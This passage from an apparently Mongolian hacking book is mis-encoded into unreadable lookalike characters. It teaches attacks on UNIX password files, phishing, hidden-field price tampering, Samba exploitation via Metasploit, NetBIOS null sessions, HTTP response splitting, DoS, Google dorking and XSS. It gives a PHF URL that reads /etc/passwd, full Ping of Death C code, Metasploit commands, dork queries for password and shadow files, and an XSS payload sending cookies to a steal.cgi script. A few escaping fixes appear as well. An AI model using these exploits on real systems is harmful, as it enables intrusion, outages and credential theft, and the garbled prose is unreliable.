Oaoo Pornu xyyaac pyyraa mnnxaaa onacou xaparnarunüu uap, uyyu
vraa xnüraaa vs aaa. 3a :a oaoo AaMnub apx:aü ôonnoo ky xnüMaap
ôaüua aaa. Xakepacau :ap rax ônunx vv...
60
- UNIX cac1eMaãa ayyu vr 1aãnax -
3xnaaa UN!X cnc:eMnüu koMMauabr Maaaar ôaüx xapar:aü. Hxaux
DOS-nüu koMMaua UN!X, L!NUX-nüux:aü oüponuoo ôaüaar. 3apnM uyxan
racau koMMauabr ônunaa.
HELP = HELP
COPY = CP
MOVE = MV
DI R = LS
DEL = RM
CD = CD
Cnc:eMa eep xau ôaüraar xapaxbu :yna WHO koMMauabr amnrnax
ôonuo. Xaparnarunüu :anaap Maaaanan aaaxbr xvcaan FI NGER
< username> rax ônuua.
UN!X cnc:eM xaparnarunüu uyyu vrnür /etc racau uap:aü anpek:op:
passwd uap:aüraap xaaranaar. Faxaaa :a :ap daünbr ouroünrooa n uyyu
61
vrvvanür aaunxua rax ôoaox ôaüraa ôon auayypuaa. Yunp us passwd
daün encrypt-naracau ôaüaar. Taaraap uyyu vrnür myya decrypt xnüx
ôonaorrvü. Taünaxaap mnüacau ôon xaMrnüu caüu uyyu vr :aünaru
Cracker Jack raaar nporpaM ôonou vrnüu cau amnrnax :aünaxbr seanex
ôaüua. 3ua us ônaunü xonôox erceu vrnüu cau aaxs vrvvanür encrypt-
naaa, ueree uyyu vr:aü xapsuyynaar.
Cnc:eMa uaa:apu uyyu vr:aü daünbr onox xapar:aü ôonx ôaüua.
Hyyu vr:aü daünbr aapaax 2 apraap onx aau ôonox kM.
1. 3apnMaaa /etc anpek:opbr FTP (File Transfer Protocol)-c
ônoknoorvü ôaüaar. Anonymous apxaap uaa:paxaa uyyu vr:aü daünbr
xaparaaxaaprvü xssraapnacau ôaüraa. Xapaa xssraapnaarvü ôon svraap
:a:ax aaaaa n ueree nporpaMaap :aünaaa n ôonoo... Xapaa xssraapnacau
ôon 2 aaxs apraap vsax xapar:aü.
2. 3apnM uar cnc:eMa cgi-bin anpek:op: PHF daün ôaüaar. PHF
daün us xaparnarunür remote access xnüx ôonoMxnür onroaor. Baô
ôpaysep aaapaa eepnüu aoa:nox rax ôyü aaônüuxaa url-r aapaax:aü
aannaap :aanaa vs.
ht t p: / / www.hacker.mn/ cgi-bin/ phf?Qalias= x%0a/ bin/ cat %20/ et c/ passwd
Baapx 2 apraap onx uaaaarvü ôon eep ôycaa apryya sMap u ôaücau
ôaüaar raarnür xanse.
Xapaa eMuex apryyaaap onx uaacau u ao:opx us ¨X" acaan ¨!" acaan
¨*" racau :aMaar:vva ôaüaan uyyu vr:aü daün Maaus shadowed ôaüua
racau vr. Shadow raaar ôon Xakep ôonou xvcaarvü xvMvvc uyyu vr:aü
daünbr asaMmnxaac xaMraanx xnüaar uar apra. XapaMcan:aü us ôna
unshadow xnüx uaaaxrvü. Faxaaa sapnMaaa uyyu vr:aü backup daünyya
shadow xnüraaarvü ôaüaar. Yvunür /etc/shadow saMaap xapx ôonuo.
Xapaa :a uyyu vrnür rap:aa opyyncau ôon eepnüu telnet client-nür
aaüpax rax ôaüraa cepaep:aü xonôoraoxoop axnyyn. Xaparnarunüu uap
uyyu vraa xnüaar uoux rapu npua. Uaamaa :aua oünroMx:oü ôns.
Xspxsa xaMraanax as?
ºax aua aaüpan:aac xaMraanax oünroMx:oü ôaüraa ôaüx.
Epeuxnüaee ôon xakepaax raaar ôon sMap uar anaaar amnrnaua racau vr.
TnüMaac aaapx anaaauyyabr rapraxrvü ôaüxaa n ôonox kM ôaüua. ºMap
u vea uyyu vraa Mam xauvv :aünaraaxaaprvü courox ôaüxbr :aua
eepnüuxee svraac seanex ôaüua.
62
- Soci al engi neeri ng -
Social engineering raaar ôon xvMvvcnüu ôycaaa n:rax n:ran ôonou
xaüura ôaüanbr amnrnaaar uarau apra kM. XvMvvc sMap uar uyxan
Maaaanan ôvxnü dopM ôernexaee, uaüaaap:aü ôaüanbr us caüu
ausaapaarrvü. Xapar:aü Maaaannaa svraap ôerneea sayynunxaar, ra:an
sapnMbux us uaaua xakepyyabu ôanacau ypxn ôaüaar. Social engineering
ôon xaanüraap nporpaM ôonou :exunk us caüu xaMraanan::aü ôaücau u
xvMvvcnüu cyn :an anaaar amnrnax cnc:eMa uaa:pax ôonoMxoo
nxacraaar svün kM. KoMnsk:ep: :ynryypnacau sans ôonou xvunü
anaaaua :ynryypnacau sans rax ao:op us xoëp :epen ôonrou aurnnaar.
Xnmaanôan Paypal-nüu :aMaarnaraar amnrnax xvMvvcnüu n:rannür onx
aaaaa :vvuaaa xvMvvcnüu kpean: kap:bu Maaaannnür uyrnyynaar caü:
onou ôaüaar. 3ypraap :aünôapnaaan:
Troj an horse ôon Social engineering-nüu uar :epen ôonaor. ºus
ôvpnüu n-Maüna xaacparaax npcau sypar rax Ma: daünyya ao:poo vvunür
aryynx ôaüaar. 3ua us daünbr vsax vea naaaxxnx, :aub koMnsk:ep:
uyyuaap cyyx :aub :yxaü Maaaannnür Xakep: erex ôonuo. `! Love You'
anpyc ôa `Anna Kournikova' aopMyya us vvunü :oa xnmaa kM.
63
Social engineering-aac xaMraanax apra ôon aua :yxaü eepnüu
Maanaraa caüxpyynax, xaparrvü n-Maün ôonou vuarvü nporpaMyyabr
koMnsk:ep:aa cyynraxrvü ôaüx. Hxaux vuarvü nporpaM ao:poo Trojan
aryynx ôaüaar. Neu sus ôvpnüu uacaua xvparuaaa sopnyncau caü:aac
kM :a:ax aaaxrvü ôaüx xapar:aü. Hyyu vraa aua :aua xaaranaxrvü ôaüx,
:aünaxaa xauvv vr erex xapar:aü.
- Phi shi ng -
Phishing ôon ôaukub ôonou e-commerce aaô caü:aa aoa:onaor apra.
Hapuaac us xapaaa :aua aua vr opx npx ôaüraa ôaüx fishing ôyky
saracunax racau vr:aü y:ra us oüponuoo. Xaparnarunüu Maaaanan, kpean:
kap:bu Maaaannnür onx aaax sopnnro:oü ôaüaar. Phishing ôon social
engineering (onou aMxnn::aü xakepaax npouecc aurnüu uyyu vr acyyxaac
axanaar) amnrnax saaan kM. ºMap uar n-Maün saxna kMyy, aaô caü:aap
aaMxyynx nnukaap :aaunü Maaaannnür aaax sopnnro:oü. Bnaunü cnaM
rax uapnaaa ôaüaar saxnauyya sapnM us ao:poo vvunür aryynx ôaüaar.
Xnmaa: Rite uap:aü anek:pou ôaukub vünunnraauaac ôa:anraaxyynax n-
Maün npcau Ma: xaparaax ôaüua.
support @rit ebank.com - Notice of Account Review Necessity! Facau
y:ra ôvxnü n-Maün npxaa.
64
H-Maün ao:op opooa vsaxaap ¨Click here to verify your account" racau
ônunr ôaüua. 3ua us aua aapaaa eepnüree ôa:anraaxyynua yy racau
y:ra:aü. Boop c:a:yc aaap xyypaMu xasr pyy saax rax ôaüraa us
xaparaax ôaüua. Faau xaparnaruna nxauxaaa vvunür ausaapaarrvü.
Xaparnaruna aua :yxaü Maaaanan caü:aü ôon eepnüu Maaaannaa
anaaxrvü aa, xapnu Maanar Myy:aüraacaa ôonx uyxan Maaaannaa anaax
xoxnpox saaan rapaar. Phishing-nüu uar xyannôap ôon xvunü n-Maünnüu
uyyu vr aaax apra kM. Xnmaa us :a Yahoo-rnüu n-Maün xasr:aü ôaüx,
ra:an uar eaep Yahoo-rnüu uapnüu eMueec :aua n-Maün npax ôonuo.
Yvua us :a n-Maünnüu uyyu vraa connxrvü yacau ôaüua. Akynrvü
ôaüanbu vvauaac aua nnuk aaap aapaaa uyyu vraa connuo yy racau
ôaüaar. Tyxaüu nnuk aaap aapaxaa Yahoo pyy opx ôaüraa kM mnr
xaparaax ôonoau vuauaaa Xakepbu ôanacau ypxn pyy opaor. Taua :a
xyyunu ôonou mnua uyyu vraa ôerneea sayynauryy: :ap us xakep: npx,
65
Xakep :aub eMueec n-Maünnüu unus uyyu vrnür consunxuo. Ta :araaa
mnua uyyu vraapaa opooa axnax yupaac ky u ausaapaxrvü. Taraaa :aub
n-Maünnüu uyyu vr:aü ôoncou Xakep ky xvccauaa xnüua mvv aaa. Honsm
yncaa cypaar uar uaüs Maaus nüM apraap n-Maünnüu uyyu vraa anacau
ôereea ôyuaax uyyu vraa onx aaaxaa ao:opx ôvx n-Maünvvanür us
yc:raunxcau ôaücau. Oep xaaau xvu u aua apraa ep:ex xoxnpcubr ôn
Maaaxrvü. TnüMaac capaMxnvvnax vvauaac vvunür ônunaa.
Yvuaac capaMxnaxnüu :yna uar svünnür ôaüura cauax xapar:aü, uap
xvua:aü caü:yya xasaa u nüM y:ra:aü n-Maün nnraaaarrvü. Taraaa
xasrnür us sea acaxnür caüu xap, xasrnüu opoua !P xasr :aascau ôaüaan
¨Ho"-:oü rax oünrox xapar:aü.
Neu aoMaüu uapnür aannxau aau xyypax :oxnonaon ôaüaar. Xnmaa
us ht t p: / / www.hacker.mn-nür ht t p: / / www.hakcer.mn racunür xaparnaru
ausaapaxrvü ôaüx ôonuo. Bac kpean: kap: ôonou :vvu:aü aann:rax
Maaaanan ôernex ôaüxaaa SSL amnrnacau acaxnür saaaan xapax
xapar:aü. SSL 100¾ uaüaaap:aü ônmaa, xakepaax ôonoMx ôaüaar. Neu
Nourona xaanüraap ôaüxrvü u nüM svünaac xaMraanaar eep xoëp svün
ôaüaar. Faxaaa xvccau ôonrou us SSL-nür xakepaax uaaaxrvü. 3ua ôon
Tokens ôa Smart Card. Nouron yncaa Smart Card-:aü ôonroë rax xvMvvc
spnaa ôaüraar auxaapaxaa nnvvaaxrvü ôaüxaa. Banxnüu xerxneec
xoupooa saxaa.
66
- OopMma ayyu 1anõap -
1opMbu uyyu :anôap (hidden fields) ôon sapnMaaa xaMrnüu aMapxau
Xakepyyaaa ep:aer svünc. Xnmaa us:
< I NPUT TYPE= HI DDEN NAME= "name" VALUE= "Dell PC">
< I NPUT TYPE= HI DDEN NAME= "price" VALUE= "$500.00">
< I NPUT TYPE= HI DDEN NAME= "sh" VALUE= "1">
< I NPUT TYPE= HI DDEN NAME= "ret urn" VALUE= "ht t p: / / www.hacker.
mn/ cgi-bin/ cart .pl?db= st uf f .dat &cat egory= &search= Dell
PCs&met hod= &begin= &display= &price= &merchant = ">
< I NPUT TYPE= HI DDEN NAME= "add2" VALUE= "1">
< I NPUT TYPE= HI DDEN NAME= "img"
VALUE= "ht t p: / / www.hacker.mn/ images/ c-14kring.j pg">
Koa ôaücau rax ôoa¡ë. 3xnaaa xyyacbr xaaranx aaaaa $500.00-nür
$2.00 ôonrooa koaoo refresh xnüraaa axnyynaaa vs. Ta oaoo 2
aonnapaap Dell PC aaax ôonoMx:oü ôonx ôaüua.
< I NPUT TYPE= HI DDEN NAME= "name" VALUE= "Dell PC">
< I NPUT TYPE= HI DDEN NAME= "price" VALUE= "$2.00">
Xspxsa xaMraanax as?
Yua ôonou :vvu:aü aann:rax Maaaannnür knneu: :an aaap xasaa xnüx
ôonoxrvü, aauaaa ererannüu cauraac :a:ax xapsuyynaar ôaüx xapar:aü.
- Samba amarnaw expl oi t xaãx -
Ta vuaxaap caüu Xakep ôonooa aanxnüu ôvx koMnsk:epnür yu:paax
:yxaü ôoaox axanôan, vvunür ôn :auar xaMrnüu cauaa rax xanax ôaüua.
ºaraaa raaan :a I SP-:aüraa u xonôoraox uaaaxrvü, n-Maünaa u manrax
ôonoMxrvü, sMap u aaô caü: vsax uaaaxrvü ôaüx ôonuo. 3ua aauavv
yü:rap:aü ônm rax vv? Taraxaap sMap uar svünnür aaaaxaacaa eMue aua
svün ôaüxrvü ôonunxaon ôn sax aa? rax eepeecee acyyx ôaüraapaü.
Bna koMnsk:epvvanüu xoopoua daün aaMxyynaxaaa FTP npo:okon
amnrnaarnür Maaua. Taraan sapnM ôpaysepyya vvu:aü aann Samba rax
uapnaraaar smb:// npo:okon amnrnax ôonaor. FTP 21 nop:br amnrnaaar
ôon Samba 139 nop:br amnrnaaar.
3xnaaa ônaaua aaüpax koMnsk:epnüuxaa nop:br manraxbu :yna
nmap raaar nporpaM xapar:aü. Xaauaac :a:ax aau ôonoxbr xaacpan:
67
xacar: ôaüraa. Ta:ax aau cyynraaa Windows-nüu cmd.exe-aap axnyynaaa
vvunür ônu: nmap -sS -sV 156.154.22.1 -254 - p 139
3ua :a eepnüuxee aaüpax rax ôaüraa koMnsk:epnüuxaa !P xasrnür
ônuua raarnür oünrocou ôaüx.
3uaaac Samba 3.X axnnnax ôaüraa 1 xoc: onanoo. Oaoo :araxaap
exploit xnüe. Yvunü :yna Windows aaap axnnnaaar frameworks2.3
xapar:aü ôonuo. Bapaax xasraap :a:ax aaaaa cyynrax ôonoMx:oü.
ht t p: / / met asploit .org/ t ools/ frameworks-2.3.exe
Axnyynaxaap ao:op us +6 exploit ôaüraa, ônaaua samba _trans2open
xapar:aü.
68
Baüpax oô¡ek:bu vünannüu cnc:eM us Linux ôon 0, FreeBSD ôon 1
rax ônuua.
set PAYLOAD l i nux_i a32_bi nd rax ônuaaa aapaa us.
show opt i ons
set RHOST 156.154.22.12
set RPORT 139
set LPORT 4444
expl oi t rax ônu.
69
- Net BI OS NULL sessi on -
Oaoo NetB!OS-nüu uar uvx ôonox NULL session apraap xakepa¡s.
3xnaaa cmd.exe-raa axnyynaaa aapaax ôaüanaap ônuua.
net vi ew \ \ 156.154.22.15 (3ua eepnüu aoa:nox !P xasraa ônuua)
Access is denied rauaa... Oaoo :araan NULL session-nü anaaar
amnrnaxaac.
net use \ \ 156.154.22.15\ I PC$ “ ” / U:” ” rax ônuaaa vs.
70
Haa:apu uaanaa, oaoo eMue ônucauaa aaxnx ônuaaa share xnüua aaa.
3ua rauuxau root uap:aü asaMmnru n ôaüua. Taraan
net use M: \ \ 156.154.22.15\ root
Oaoo cmd.exe rapraaa N:\ raaa n ônuunx, ky rapx npaxnür xap.
3a :a oaoo ky xnüMaap ôaüua vvu aaap...
71
- HTTP xapayn1 oopunox -
HTTP :onroüu Maaaanan eepunen: opyynaxbr kem-uaüpyynax, cross-
site scripting, hijack rax uapnaaar. 3araap apryyabr aanrapvvnx vsax
ôonuo. Xnmaa us aapaax koabr sayyncau rax vsse n aaa.
St ring aut hor = request .get Paramet er(AUTHOR_PARAM);
Cookie cookie = new Cookie("aut hor", aut hor);
cookie.set MaxAge(cookieExpirat ion);
response.addCookie( cookie);
Xapnyn: aapaax ôaüaan:aü npua.
HTTP/ 1.1 200 OK
...
Set -Cookie: aut hor= Jane Smit h
Xapaa Xakep NGL Hacker\ r\ nHTTP/ 1.1 200 OK\ r\ n... aaapx Mepnür uaMaaa
opyynunxaan, nüM ôonuo racau vr.
Set -Cookie: aut hor= MGL Hacker
HTTP/ 1.1 200 OK
...
Xnmaa sypraap shoplift xapxau xnüarnür xap¡s. 3ua xs:aabu uar e-
commerce caü: ôaüua. Bnaunü courocou ôapaa 1290 racau vua:aü ôaüua.
72
Oaoo :araan vunür us 1290-nür 1 ôonrox consx ônuse...
Xapx ôaüua yy? HüM ôaüaana opoxrvüu :yna aaôaa xnüxaaa caüu
ôoaox xnüraapaü.
73
- DoS Baãpan1 -
Baap ônunracau apryyaaac sapnMbr us oaoo vsax ôonuo. XaMrnüu
axnaaa DoS ôyky Denial of Service-nüu :yxaü :aünôapnas. DoS aaüpan:
us epeuxnüaee aaô cepaepnür yuaraax acaan ypcranbr vepnvvnax
sopnnro:oü. DoS aaüpan: ao:poo xoopouaoo ôara sapar snraa:aü Mam
onou :epen ôaüaar. Xnmaa us:
• Ping of Deat h
• Teardrop
• Ping Flooding
• Amplificat ion
• D-DoS
• SYN-Flooding
• Port scan
• St ealt h SYN scan
• FI N / X-Mas / Null-Scan
• Spoof
• I dle-Scan
• Shroud Proactive rax Ma: uaaua us onou :epen ôaüaar.
3araapnür sMap sopnnro:oür :aünôapnaxbr xnuaae. 3araap us ôvra n
sMap uar svünnüu anaaau aaap cyypnnaar raaa oünrounxaon aMap ôaüx
ôonoa yy.
Pi ng of Deat h: !P nake:bu xaMxaa 6550/ (65535-20-8) ôaüaar,
:araan 65536 nnraaaan ky ôonox ôon?! 3ua 8 us !CNP :onroü
Maaaanan, 20 us !P xasrub :onroü Maaaanan aryynaraaar. Faxaaa ôna
myya ping sayynaxaa ¨Request timed out" raaa ping Maaus vxunxaar
mvv aaa. Uaauaa xapnynaxrvüraap :oxnpyynunxcau yupaac :ap.
3ua C xan aaap ônucau koa :aannaa.
# ifdef LI NUX
# define REALLY_RAW
# define __BSD_SOURCE
# if ndef I P_MF
# define I P_MF 0x2000
# define I P_DF 0x4000
# define I P_CE 0x8000
# define I P_OFFSET 0x1FFF
# endif
# endif
74
# include < st dio.h>
# include < sys/ t ypes.h>
# include < sys/ socket .h>
# include < net db.h>
# include < net inet / in.h>
# include < net inet / in_syst m.h>
# include < net inet / ip.h>
# include < net inet / ip_icmp.h>
# include < st ring.h>
# include < arpa/ inet .h>
/ *
* I f your kernel doesn't muck wit h raw packet s, # define REALLY_RAW.
* This is probably only Linux.
* /
# ifdef REALLY_RAW
# define FI X( x) ht ons(x)
# else
# define FI X( x) (x)
# endif
int
main(int argc, char * * argv)
{
int s;
char buf[ 1500] ;
st ruct ip * ip = (st ruct ip * )buf;
# ifdef LI NUX
st ruct icmphdr * icmp = (st ruct icmphdr * )(ip + 1);
# else
st ruct icmp * icmp = ( st ruct icmp * )(ip + 1) ;
# endif
st ruct host ent * hp;
st ruct sockaddr_in dst ;
int offset ;
int on = 1;
75
bzero(buf, sizeof buf) ;
if ((s = socket (AF_I NET, SOCK_RAW,
# ifdef LI NUX
I PPROTO_I CMP
# else
I PPROTO_I P
# endif
)) < 0) {
perror("socket ") ;
exit (1) ;
}
if (set sockopt (s, I PPROTO_I P, I P_HDRI NCL, &on, sizeof(on)) < 0) {
perror("I P_HDRI NCL");
exit (1) ;
}
if (argc ! = 2) {
fprint f(st derr, "usage: %s host name\ n", argv[ 0] );
exit (1) ;
}
if ((hp = get host byname(argv[ 1] )) = = NULL) {
if ((ip-> ip_dst .s_addr = inet _addr(argv[ 1] ) ) = = -1) {
fprint f(st derr, "%s: unknown host \ n", argv[ 1] );
exit (1) ;
}
} else {
bcopy(hp-> h_addr_list [ 0] , &ip-> ip_dst .s_addr, hp-> h_lengt h);
}
print f( "Sending t o %s\ n", inet _nt oa(ip-> ip_dst ));
ip-> ip_v = 4;
ip-> ip_hl = sizeof * ip > > 2;
ip-> ip_t os = 0;
ip-> ip_len = FI X(sizeof buf);
ip-> ip_id = ht ons(4321);
ip-> ip_off = FI X(0) ;
ip-> ip_t t l = 255;
ip-> ip_p = 1;
# ifdef LI NUX
ip-> ip_csum = 0; / * kernel fills in * /
76
# else
ip-> ip_sum = 0; / * kernel fills in * /
# endif
ip-> ip_src.s_addr = 0; / * kernel fills in * /
dst .sin_addr = ip-> ip_dst ;
dst .sin_family = AF_I NET;
# ifdef LI NUX
icmp-> t ype = I CMP_ECHO;
icmp-> code = 0;
icmp-> checksum = ht ons(~ (I CMP_ECHO < < 8));
/ * t he checksum of all 0's is easy t o comput e * /
# else
icmp-> icmp_t ype = I CMP_ECHO;
icmp-> icmp_code = 0;
icmp-> icmp_cksum = ht ons( ~ (I CMP_ECHO < < 8));
/ * t he checksum of all 0's is easy t o comput e * /
# endif
for (off set = 0; off set < 65536; of fset + = (sizeof buf - sizeof * ip)) {
ip-> ip_of f = FI X(offset > > 3);
if (of fset < 65120)
ip-> ip_of f | = FI X(I P_MF);
else
ip-> ip_len = FI X(418); / * make t ot al 65538 * /
if (sendt o(s, buf , sizeof buf , 0, (st ruct sockaddr * )&dst ,
sizeof dst ) < 0) {
fprint f(st derr, "of fset %d: ", of fset );
perror( "sendt o");
}
if ( of fset = = 0) {
# ifdef LI NUX
icmp-> t ype = 0;
icmp-> code = 0;
icmp-> checksum = 0;
# else
icmp-> icmp_t ype = 0;
icmp-> icmp_code = 0;
77
icmp-> icmp_cksum = 0;
# endif
}
}
ret urn 0;
}
Teardr op: !P xasrnüu xacarnax sayynaxaa TCP/!P uvx nnapu
xacrvvanür uyrnyynax rax oponaaor.
Pi ng Fl oodi ng: Cepaepnür xapny vünaan xnüx uaaaxrvü ôon:on ping
nake: nnraaaar.
Ampl i f i cat i on: Ping Flood mnr ôonoau aaüpan:br Broadcast xasr ôa
Spoof amnrnacuaap nake:aa xaa aaxnu ecreaer.
Di st ri but ed DoS: DoS, D-DoS xoëpbu snraa us smurf amnrnax uar
xoc:ooc aaüpaan DoS ôonuo. Onou Zombie sapar amnrnax aaüpaan
D-DoS.
Zombie raaar ônaunü aMsapan aaap Maaaar aMsa vxaan:aü y:rbu
xyasa :ec:aü. TnüMaac u nurax uapnacau ôaüx. Zombie-rnüu sopnnro us
:a sMap uar koMnsk:epnür xakepaaxaap ôonnoo rax ôoaoxoa eepee
myya :yxaüu koMnsk:ep nvv aaüpaxrvü xapnu eep koMnsk:epaap
aaMxyynx aaüpaar. Huracuaap ôyuaaraaa :aubr ôapnxaa xauvv ôonuo.
Op:eru koMnsk:epaac xau xakepacaubr xapaxaa :aub zombie xaparaax
ôonoxooc :a xaparaaxrvü kM.
Zombie ôonroxoa aapaax maapanaryyabr xauracau ôaüx xapar:aü:
• Taub xsuax sopnnro:oü PC pyy opox ôonoMx:oü.
• I PI D – indet ificat ion number-r Maaax xapar:aü.
• Bycaa xvMvvc:aü Mam ôara Maaaanan connnuaor ôaüx
xapar:aü.
78
SYN Fl oodi ng: 3xnaaa TCP/SYN nake:br nnraaxaa aaüpax rax
ôaüraa cepaep xapnya us TCP/SYN-ACK nake:br nnraaraaa ôyuax
TCP/ACK nake: npaxnür xvnaaaar. Faau Xakepaaru ACK nake:br
nnraaxrvü xapnu half-open ôaüanbr us amnrnaaar.
FI N / X- mas / Nul l - Scan: 3ua apra us sMap uar xonôoo
:or:ooaorrvü, xapnu ôara ôaraap yparmaa axnnnaaar. Xnmaa us:
Har uaan::aü nop: ôaünaa raxaa :a :vvunür xsuaxrvü xapnu :ap
xaanra xaaraaan reset nake:aa sayynaar.
Spoof : Xnmaa us WinSSLNiN. Neu URL Spoof, !P Spoof rax ôaüaar.
WinSSL Man in t he Middle-r sypraap :aünôapnaaan nnvv oünroMx:oü
ôonox ôaüx.
79
I dl e-Scan: nNap, !P identification number amnrnax Zombie-roop
aaMxyynaar. Oaoornüu ôaüanaap xaMrnüu caüu vn xaparaaru xsuax
cnc:eM kM.
Xspxsa xaMraanax as?
Kyub eMue anpycunü acpar nporpaM, ran: xaua xoëpbr cyynra. Fon
us ran: xaubuxaa :oxnproor sea xnüx xapar:aü.
DoS aaüpan: ôonx ôaüraar xapxau Maaax aa?
• Hu:epua: xonôon: Mam yaaau ôonox
• 3apnM aaôvva naaaxrvü ôonox
• ºMap u aaô caü: pyy opx ôonoxrvü ôaüx
• Nam nx saMôpaarvü spam npax
Harau: :aus pyy aoa:onx ôaüraar Maacau ôon axnaaa xaauaac
aoa:onx ôaüraar onox xapaa :a Mapraxnnüu xvu ônm ôon akcnep:vvaaa
xauaax, !SP aaa Maaaraax rax Ma: apra xaMxaar aau ôonox kM.
- Googl e hack -
Faaaaabu Xakepyyabu dopyM pyy opoxoa ¨Bn xapxau caüu Xakep
ôonox aa?" racau acyyn: Mam nx ôaüaar. Xapnu Xakepyya xapnya us uar n
vrnür aauaaa xanaar. 3ua us ¨Google-aac acyy" racau vr kM.
Ta ônaunü caüu Maaax Google xaün:bu cnc:eM Maaus xakepyyabu
caüu uaüs raaan :a raüxax ôaüx. Xakepyya Google xaün:bu cnc:eMnür
amnrnax xakepaax vün axnnnaraaraa sayynx ôonaor. Bapaax vrcnüu
ans uaraap xaün: xnüxaa xakepaaxaa :aua xakepaaxaa xapar:aü
Maaaannvva rapu npax ôonuo. 3eaxeu Google ran:rvü NSN, Yahoo aaap u
xnüx ôonaor.
• allinurl: winnt / syst em32/
• allint it le: "index of/ root "
• allint it le: "index of/ admin"
• inurl: “ wwwroot / * .“
• filet ype: ht passwd ht passwd
• inurl: admin filet ype: db
• inurl: iisadmin
• users.pwd
• index.of.privat e (algo privado)
• int it le: index.of mast er.passwd
• inurl: passlist .t xt (para encont rar list as de passwords)
80
• int it le: "I ndex of..et c” passwd
• int it le: admin int it le: login
• “ I ncorrect synt ax near” (SQL script error)
• int it le: index.of ws_ft p.ini
• inurl: backup int it le: index.of inurl: admin
• “ I ndex of / backup”
• index.of.password
• index.of.winnt
• inurl: "aut h_user_file.t xt ”
• “ I ndex of / mail”
• “ I ndex of / ” + passwd
• I ndex of / ” + .ht access
• I ndex of ft p + .mdb allinurl: / cgi-bin/ + mailt o
• allint it le: rest rict ed filet ype : mail
• administ rat or.pwd.index
• aut hors.pwd.index
• service.pwd.index
• inurl: "aut h_user_file.t xt ”
• allinurl: / bash_hist ory
• int it le: "I ndex of” pwd.db
• int it le: "I ndex of” et c/ shadow
• int it le: "I ndex of” ht passwd
• service.pwd
• users.pwd
• administ rat ors.pwd
• wwwboard.pl
• www-sql
• pwd.dat
• ws_ft p.log
• aut hors.pwd rax Ma: Mam onou vraap xaüx onx ôonaor.
Neu Java-r ôv:aaru Sun kopnopaunüu 2005 oua Maaaancuaap Google-
nüu uvx us Xakepyyaaa aauavv nx Maaaannnür eru ôaüraa ôereea vvu
ao:op :a ônaunü sayyncau n-Maünaap aaMxyynx xyanüu Maaaanan, uyyu
vrnür Maaus xvp:an onx aau uaaax ôaüua raxaa.
Xnmaa us ôn xaa xouornüu eMue xaüxaa aapaax xyyaacuyya rapu
npcau ôonuo. Xakepaax Maaaar xvMvvc sMapxyy svün aa raarnür xapaaa n
Maaax ôns.
81
82
83
- Cr oss Si t e Scri pt i ng ( XSS) -
Cross Site Scripting ôyky XXS aaüpan: ôon sMap uar input-aap
aaMxyynx eepnüu koaoo xaparnax saaan kM. Xakepbu ôanacau nnuk
aaap aapcuaap JavaScript koa axnnnax xaparnarunüu cookie rax Ma:
Xakep nyy nnraaraaua. ºus ôvpnüu ckpnn: ôaüx ôonox ôonoau ronayy n
JavaScript aaap xnüaar. Cookie xynraünaxbr hij ack rax uapnaaar.
Xaparnaru eepnüu Maaaannaa eepunex vea us axnnnax Maaaannnür us
Xakep nyy nnraax vünannür xnüaar. ºnaurysa knneu: :an aaap apcaan
nnvv euaep ôaüua. Firef ox-nüu cookie edit or-nür amnrnax ep:erunüu
cookie-r opyynx eru ôonuo. Refresh aapaaa ep:erunüu :enceu
ôv:aaraaxvvuvvanür xaparnax ôonoMx:oü.
PoC exploit ôon ep:erunür aurnüuaap eep :nüm us mnnxvvnax
sopnnro:oü. 3ua ôon xaMrnüu aMapxau cookie aaax apra.
84
Powered By !nvision Power Boards 1.3.1 rax Ma: vuarvü ôanau source-
br xapxau aua apraap xakepaax ôonox :yxaü svünc Google-aap avvpau
ôaüraa. 3ua apraap n Script kiddies aaôvvanür yuaraaaar.
PHP Nuke-nüu uvx:
ht t p: / / localhost / nuke73/ modules.php?name= News&file= art icle&sid= 1&opt i
onbox=
[ 'ht t p: / / sample.com/ ph33r/ st eal.cgi?'+ document .cookie]
3xnaaa textbox ôernexea HTNL xan pvv xepavvnx ôaüraa acaxnür
manraua. Xnmaa us:
' SearchResult .aspx.vb
I mport s Syst em
I mport s Syst em.Web
I mport s Syst em.Web.UI
I mport s Syst em.Web.UI .WebCont rols
Public Class SearchPage I nherit s Syst em.Web.UI .Page
Prot ect ed t xt I nput As Text Box
Prot ect ed cmdSearch As But t on
Prot ect ed lblResult As Label Prot ect ed
Sub cmdSearch _Click( Source As Obj ect , _ e As Event Args)
/ / Do Search…..
lblResult .Text = "You Searched for: " & t xt I nput .Text
/ / Display Search Result s…..
/ / …………
End Sub
End Class
Baapx xnmaa us aaap xaün:bu dyuku us xaparnarunüu opyyncau
Maaaannnür manraxrvü ôaüraa yunp cross-site script xnüx ôonoxoop
anaaa:aü ôaüua.
Yvunür .NET :exuonorn aaap sacaxaaa <¾@ Page
validateRequest="false" ¾> Mepnür uaMx ercueep anaaa:aü xvcan:nür
rapraxrvü ôaüx ôonoMx:oü. Faau Server.HtmlEncode(string) amnrnax
Text box aaapaa vvunür ônunx ercueep ôyuaaraaa xvunurvü ôonrounxox
ôonuo.
< %@ Page Language= "C# " Validat eRequest = "false" %>
< script runat = "server">
void searchBt n _Click(obj ect sender, Event Args e) {
Response.Writ e(Ht t pUt ilit y.Ht mlEncode(input Txt .Text ) ); }
85
< / script >
< ht ml>
< body>
< form id= "form1" runat = "server">
< asp: Text Box I D= "input Txt " Runat = "server" Text Mode= "Mult iLine"
Widt h= "382px" Height = "152px">
< / asp: Text Box>
< asp: But t on I D= "searchBt n" Runat = "server" Text = "Submit " OnClick= "
searchBt n _Click" / >
< / form>
< / body>
< / ht ml>
3apnM xvMvvc SSL-:aü caü:br XSS xnüx ôonoMxrvü rax oünroaor,
aua ôon xyanaa oünron: kM.
Xspxsa xaMraanax as?
I nput -yyabu yp:br saaaan saax erex, uar nx yp: ôaüx xaparrvü.
Xepavvnan: xnüaar ôaüx xapar:aü, myya HTNL xanôapaap xaparaaarrvü
ôaüx. Xapnu aaô aaapaa ôna :ycraü :aMaar:vvanür xepavvnaraap
xnücuaap akynaac ôara u a:yraü xonaouo. Xnmaa us <script> rax
ônucaunür 8lt;script8gt; rax xepavvnx xapyynua. Boop sapnM :ycraü
:aMaar:nür koabr xapyynnaa.
< &lt ;
> &gt ;
# &# 35;
& &amp;
" &quot ;
Perl xanunü mod_perl aurnüuaap XSS-nür xaMraanax ôonoMxnür onroaor.
# ! / usr/ bin/ perl
use CGI ;
use HTML: : Ent it ies;
my $cgi = CGI -> new();
my $t ext = $cgi-> param('t ext ');
print $cgi-> header();
print "You ent ered ", HTML: : Ent it ies: : encode($t ext ) ;
86
- SQL i nj ect i on -
